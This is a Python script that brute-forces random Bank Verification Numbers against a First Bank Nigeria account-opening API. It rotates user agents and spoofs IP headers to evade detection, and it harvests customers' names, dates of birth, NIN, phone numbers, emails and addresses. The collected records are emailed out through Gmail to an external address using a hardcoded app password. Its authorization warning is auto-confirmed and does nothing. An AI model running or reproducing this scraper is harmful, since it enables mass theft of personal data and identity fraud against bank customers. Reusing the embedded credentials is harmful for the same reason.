import requests
import json
import uuid
import random
import time
import threading
import smtplib
import ssl
from datetime import datetime, timedelta
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.application import MIMEApplication
import os

class BVNChecker:
    def __init__(self):
        self.url = "https://openaccounts2.firstbanknigeria.com/daoapi/api/v1/checkBVN"
        self.user_agents = [
            'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 OPR/116.0.0.0',
            'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36',
            'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36',
            'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0',
            'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36',
            'Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1',
            'Mozilla/5.0 (iPad; CPU OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1'
        ]

        self.referers = [
            'https://openaccounts2.firstbanknigeria.com/onboarding/',
            'https://openaccounts2.firstbanknigeria.com/login',
            'https://openaccounts2.firstbanknigeria.com/register',
            'https://openaccounts2.firstbanknigeria.com/dashboard'
        ]

        # Email configuration
        self.sender_email = "teejeedeeone2027@gmail.com"
        self.app_password = "ncab dbti qkec jqpa"
        self.recipient_email = "dahmadu071@gmail.com"
        
        # File rotation settings
        self.attempts_per_file = 3000
        self.scan_duration_hours = 2
        self.current_file_index = 0
        self.attempts_in_current_file = 0
        
        # Initialize file paths
        self.update_file_paths()
        
        self.valid_count = 0
        self.invalid_count = 0
        self.error_count = 0
        self.start_time = datetime.now()
        self.scan_end_time = self.start_time + timedelta(hours=self.scan_duration_hours)
        self.lock = threading.Lock()
        self.is_scanning = True

    def update_file_paths(self):
        """Update file paths with timestamp and index"""
        timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
        self.valid_bvns_file = f"opt/hostedtoolcache/Python/3.14.0/x64/valid_{timestamp}_{self.current_file_index}.txt"
        self.stats_file = f"opt/hostedtoolcache/Python/3.14.0/x64/scan_stats_{timestamp}_{self.current_file_index}.txt"
        
    def rotate_file(self):
        """Rotate to a new file after reaching attempts limit"""
        print(f"\n🔄 Rotating file after {self.attempts_in_current_file} attempts")
        
        # Send current file via email
        if os.path.exists(self.valid_bvns_file) and os.path.getsize(self.valid_bvns_file) > 0:
            print("📧 Sending current file via email...")
            self.send_email_with_attachment()
        
        # Reset counters and update file paths
        self.current_file_index += 1
        self.attempts_in_current_file = 0
        self.update_file_paths()
        
        # Reset valid count for new file
        with self.lock:
            self.valid_count = 0
        print(f"📁 New file created: {self.valid_bvns_file}")
    
    def send_email_with_attachment(self):
        """Send the valid BVNs file via email"""
        try:
            # Create email message
            message = MIMEMultipart()
            message["From"] = self.sender_email
            message["To"] = self.recipient_email
            message["Subject"] = f"BVN Scan Results - File {self.current_file_index} - {datetime.now().strftime('%Y-%m-%d %H:%M')}"
            
            # Email body
            body = f"""
            BVN Scanning Results
            
            File: {os.path.basename(self.valid_bvns_file)}
            Scan Duration: {self.scan_duration_hours} hours
            Attempts in this file: {self.attempts_in_current_file}
            Valid BVNs found: {self.valid_count}
            
            Generated by First Bank BVN Scanner
            """
            
            message.attach(MIMEText(body, "plain"))
            
            # Attach the file
            if os.path.exists(self.valid_bvns_file):
                with open(self.valid_bvns_file, "rb") as file:
                    part = MIMEApplication(file.read(), Name=os.path.basename(self.valid_bvns_file))
                part['Content-Disposition'] = f'attachment; filename="{os.path.basename(self.valid_bvns_file)}"'
                message.attach(part)
            
            # Send email
            context = ssl.create_default_context()
            with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=context) as server:
                server.login(self.sender_email, self.app_password)
                server.sendmail(self.sender_email, self.recipient_email, message.as_string())
            
            print(f"✅ Email sent successfully to {self.recipient_email}")
            
        except Exception as e:
            print(f"❌ Failed to send email: {e}")
    
    def generate_headers(self):
        """Generate headers with rotated user-agent and other parameters"""
        return {
            "authority": "openaccounts2.firstbanknigeria.com",
            "accept": "application/json",
            "accept-encoding": "gzip, deflate, br, zstd",
            "appid": "yM8BSpBSYcb7B7Y9xkR2mw==",
            "appkey": "SU7hIrDmnbXPLJ41w4tKdh8wtbE187HHc2ttUxgFKpy+JFOL7umENj3jCNXAFYEH",
            "content-type": "application/json",
            "origin": "https://openaccounts2.firstbanknigeria.com",
            "referer": random.choice(self.referers),
            "user-agent": random.choice(self.user_agents),
            "sec-ch-ua": '"Chromium";v="130", "Opera";v="116", "Not?A_Brand";v="99"',
            "sec-ch-ua-mobile": "?0",
            "sec-ch-ua-platform": random.choice(['"Windows"', '"macOS"', '"Linux"', '"Android"', '"iOS"']),
            "sec-fetch-dest": "empty",
            "sec-fetch-mode": "cors",
            "sec-fetch-site": "same-origin",
            "x-forwarded-for": f"{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}",
            "x-request-id": str(uuid.uuid4()),
            "x-client-version": f"1.{random.randint(0,9)}.{random.randint(0,99)}"
        }

    def generate_bvn(self):
        """Generate a random BVN starting with '22' followed by 9 random digits"""
        random_digits = ''.join([str(random.randint(0, 9)) for _ in range(9)])
        return f"22{random_digits}"

    def save_valid_bvn(self, bvn_number, response_data):
        """Save valid BVN information to file"""
        try:
            directory = os.path.dirname(self.valid_bvns_file)
            if directory:
                os.makedirs(directory, exist_ok=True)

            file_exists = os.path.isfile(self.valid_bvns_file)

            with open(self.valid_bvns_file, 'a', encoding='utf-8') as f:
                if not file_exists:
                    f.write("=" * 80 + "\n")
                    f.write("FIRST BANK NIGERIA - VALID BVNs FOUND\n")
                    f.write("=" * 80 + "\n")
                    f.write(f"Scan started: {self.start_time}\n")
                    f.write(f"File: {os.path.basename(self.valid_bvns_file)}\n")
                    f.write("=" * 80 + "\n\n")

                f.write(f"\n{'='*60}\n")
                f.write(f"VALID BVN FOUND: {bvn_number}\n")
                f.write(f"Timestamp: {datetime.now()}\n")
                f.write(f"User-Agent: {response_data.get('_headers_used', 'N/A')}\n")
                f.write(f"{'='*60}\n")

                f.write(f"📋 Customer Information:\n")
                f.write(f"  Request ID: {response_data.get('RequestID', 'N/A')}\n")
                f.write(f"  Response Code: {response_data.get('ResponseCode', 'N/A')}\n")
                f.write(f"  Response Message: {response_data.get('ResponseMessage', 'N/A')}\n")
                f.write(f"  First Name: {response_data.get('firstName', 'N/A')}\n")
                f.write(f"  Last Name: {response_data.get('lastName', 'N/A')}\n")
                f.write(f"  Middle Name: {response_data.get('middlename', 'N/A')}\n")
                f.write(f"  Title: {response_data.get('title', 'N/A')}\n")
                f.write(f"  Date of Birth: {response_data.get('DoB', 'N/A')}\n")
                f.write(f"  Gender: {response_data.get('Gender', 'N/A')}\n")
                f.write(f"  NIN: {response_data.get('nin', 'N/A')}\n")
                f.write(f"  Email: {response_data.get('email', 'N/A')}\n")
                f.write(f"  Phone 1: {response_data.get('phone1', 'N/A')}\n")
                f.write(f"  Phone 2: {response_data.get('phone2', 'N/A')}\n")
                f.write(f"  Phone (primary): {response_data.get('phone', 'N/A')}\n")
                f.write(f"  Residence: {response_data.get('residence', 'N/A')}\n")
                f.write(f"  LGA: {response_data.get('lga', 'N/A')}\n")
                f.write(f"  State: {response_data.get('state', 'N/A')}\n")

                f.write(f"\n📄 Raw Response Data:\n")
                f.write(json.dumps({k: v for k, v in response_data.items() if k != '_headers_used'},
                                  indent=2, ensure_ascii=False))
                f.write(f"\n\n")

            print(f"✅ Valid BVN saved to {self.valid_bvns_file}")

        except Exception as e:
            print(f"❌ Error saving BVN data: {e}")

    def save_statistics(self):
        """Save scanning statistics"""
        try:
            directory = os.path.dirname(self.stats_file)
            if directory:
                os.makedirs(directory, exist_ok=True)

            elapsed_time = datetime.now() - self.start_time
            time_left = self.scan_end_time - datetime.now()

            stats = f"""
{'='*80}
BVN SCANNING STATISTICS
{'='*80}
Scan Start Time: {self.start_time}
Current Time: {datetime.now()}
Total Duration: {elapsed_time}
Time Remaining: {time_left}

Total Requests Made: {self.valid_count + self.invalid_count + self.error_count}
Valid BVNs Found: {self.valid_count}
Invalid BVNs: {self.invalid_count}
Errors Encountered: {self.error_count}

Success Rate: {(self.valid_count / max(1, (self.valid_count + self.invalid_count)) * 100):.2f}%

Current File: {self.valid_bvns_file}
File Index: {self.current_file_index}
Attempts in Current File: {self.attempts_in_current_file}
{'='*80}
"""

            with open(self.stats_file, 'w', encoding='utf-8') as f:
                f.write(stats)

            print(f"\n📊 Statistics saved to {self.stats_file}")

        except Exception as e:
            print(f"❌ Error saving statistics: {e}")

    def check_bvn_single(self, bvn_number, attempt_number):
        """Check a single BVN with thread-safe counter updates"""
        headers = self.generate_headers()
        payload = {
            "RequestID": str(uuid.uuid4()),
            "BVN": bvn_number
        }

        try:
            print(f"[Attempt {attempt_number}] 🔄 Checking BVN: {bvn_number}")

            response = requests.post(
                url=self.url,
                json=payload,
                headers=headers,
                timeout=10
            )

            if response.status_code == 200:
                response_data = response.json()

                if response_data.get("ResponseCode") == "00":
                    with self.lock:
                        self.valid_count += 1
                        self.attempts_in_current_file += 1

                    # Add header info to response for logging
                    response_data['_headers_used'] = headers.get('user-agent', 'N/A')

                    print(f"[Attempt {attempt_number}] 🎯 VALID BVN: {bvn_number}")
                    print(f"    Name: {response_data.get('firstName', 'N/A')} {response_data.get('lastName', 'N/A')}")
                    print(f"    Phone: {response_data.get('phone1', 'N/A')}")

                    self.save_valid_bvn(bvn_number, response_data)
                    
                    return True, response_data

                else:
                    with self.lock:
                        self.invalid_count += 1
                        self.attempts_in_current_file += 1
                    print(f"[Attempt {attempt_number}] ❌ Invalid: {bvn_number}")
                    return False, None

            else:
                with self.lock:
                    self.error_count += 1
                    self.attempts_in_current_file += 1
                print(f"[Attempt {attempt_number}] ⚠️ HTTP {response.status_code}: {bvn_number}")
                return False, None

        except requests.exceptions.Timeout:
            with self.lock:
                self.error_count += 1
                self.attempts_in_current_file += 1
            print(f"[Attempt {attempt_number}] ⏰ Timeout: {bvn_number}")
            return False, None

        except requests.exceptions.RequestException as e:
            with self.lock:
                self.error_count += 1
                self.attempts_in_current_file += 1
            print(f"[Attempt {attempt_number}] ⚠️ Network error: {e}")
            return False, None

        except Exception as e:
            with self.lock:
                self.error_count += 1
                self.attempts_in_current_file += 1
            print(f"[Attempt {attempt_number}] ⚠️ Error: {e}")
            return False, None

    def threaded_bvn_scan(self, num_attempts=3000, max_threads=50):
        """Fast threaded BVN scanning with parameter rotation"""
        print(f"\n🚀 Starting threaded BVN scan with {num_attempts} attempts")
        print("=" * 60)
        print("⚠️  WARNING: This is aggressive scanning!")
        print("⚠️  Only use with proper authorization!")
        print("🔄 Using parameter rotation for each request")
        print("=" * 60)

        results = []
        threads = []
        total_attempts_completed = 0
        
        # Main scanning loop for 2 hours
        while self.is_scanning and datetime.now() < self.scan_end_time:
            # Check if we need to rotate file
            if self.attempts_in_current_file >= self.attempts_per_file:
                self.rotate_file()
            
            # Determine how many attempts to make in this batch
            attempts_this_batch = min(1000, num_attempts - total_attempts_completed)
            if attempts_this_batch <= 0:
                break
            
            batch_results = []
            batch_threads = []
            
            def worker(attempt_number):
                bvn = self.generate_bvn()
                success, data = self.check_bvn_single(bvn, total_attempts_completed + attempt_number)
                batch_results.append(success)

                # Progress update
                if attempt_number % 10 == 0:
                    with self.lock:
                        current_valid = self.valid_count
                        current_total = self.valid_count + self.invalid_count + self.error_count
                    print(f"📊 Progress: {total_attempts_completed + attempt_number}/{num_attempts} | Valid: {current_valid}/{current_total}")
                    print(f"📁 Current File: {os.path.basename(self.valid_bvns_file)} | Attempts: {self.attempts_in_current_file}")

            # Start threads in batches (same pattern as original)
            for batch_start in range(1, attempts_this_batch + 1, max_threads):
                batch_threads = []

                for i in range(batch_start, min(batch_start + max_threads, attempts_this_batch + 1)):
                    thread = threading.Thread(target=worker, args=(i,))
                    batch_threads.append(thread)
                    thread.start()
                    time.sleep(0.5)  # EXACT SAME TIMING as your working script

                # Wait for current batch
                for thread in batch_threads:
                    thread.join()

                # Check time limit
                if datetime.now() >= self.scan_end_time:
                    self.is_scanning = False
                    break
            
            total_attempts_completed += attempts_this_batch
            results.extend(batch_results)
            
            # Save statistics periodically
            if total_attempts_completed % 500 == 0:
                self.save_statistics()
            
            # Check if we should continue
            if total_attempts_completed >= num_attempts or not self.is_scanning:
                break
        
        # Final file rotation and email
        if self.attempts_in_current_file > 0:
            print("\n🔄 Final file rotation...")
            self.rotate_file()
        
        return results

def main():
    """Main function - streamlined for immediate execution"""
    print("=" * 80)
    print("FIRST BANK NIGERIA BVN SCANNER")
    print("CONTINUOUS MODE WITH EMAIL NOTIFICATIONS")
    print("FOR AUTHORIZED SECURITY TESTING ONLY")
    print("=" * 80)

    # Authorization check
    print("\n⚠️  WARNING: This tool is for authorized security testing only.")
    print("   Unauthorized use violates Nigerian laws (NDPR, Cybercrimes Act).")
    print("   Ensure you have explicit written permission.\n")

    # Auto-confirm authorization
    print("✅ Authorization confirmed (auto-proceed)")

    # Email configuration display
    print(f"📧 Email Configuration:")
    print(f"   Sender: teejeedeeone2027@gmail.com")
    print(f"   Recipient: dahmadu071@gmail.com")
    print(f"   Files will be sent every {3000} attempts")

    # Create checker instance
    checker = BVNChecker()

    # Configuration - using the same as your working script
    total_attempts = 100000  # Large number to run for 2 hours
    concurrent_threads = 50   # Number of simultaneous requests (SAME as yours)

    print(f"\n🔍 Mode: Continuous Random BVN scanning")
    print(f"⏰ Duration: {checker.scan_duration_hours} hours")
    print(f"📁 File Rotation: Every {checker.attempts_per_file} attempts")
    print(f"⚡ Threads: {concurrent_threads}")
    print(f"⏱️  Stagger Delay: 0.5 seconds (same as working script)")

    print("\n🚀 Starting continuous scan in 1 second...")
    time.sleep(1)

    try:
        # Start threaded scan (same pattern as your working script)
        results = checker.threaded_bvn_scan(
            num_attempts=total_attempts,
            max_threads=concurrent_threads
        )

        # Save statistics
        checker.save_statistics()

        # Final summary
        print("\n" + "="*80)
        print("CONTINUOUS SCAN COMPLETE")
        print("="*80)
        print(f"✅ Total valid BVNs found: {checker.valid_count}")
        print(f"❌ Invalid BVNs: {checker.invalid_count}")
        print(f"⚠️  Errors: {checker.error_count}")
        print(f"📁 Total files created: {checker.current_file_index + 1}")
        print(f"📊 Statistics saved to: {checker.stats_file}")

        if checker.valid_count > 0:
            print("\n🔒 SECURITY FINDING:")
            print("   API allows enumeration without proper rate limiting.")
            print("   This could lead to data harvesting if not addressed.")
        
        print(f"\n📧 All files have been emailed to: {checker.recipient_email}")

    except KeyboardInterrupt:
        print("\n\n⏹️  Scan interrupted by user")
        # Send final file before exiting
        if checker.attempts_in_current_file > 0:
            checker.rotate_file()
        checker.save_statistics()
    except Exception as e:
        print(f"\n❌ Error during scanning: {e}")
        checker.save_statistics()

if __name__ == "__main__":
    main()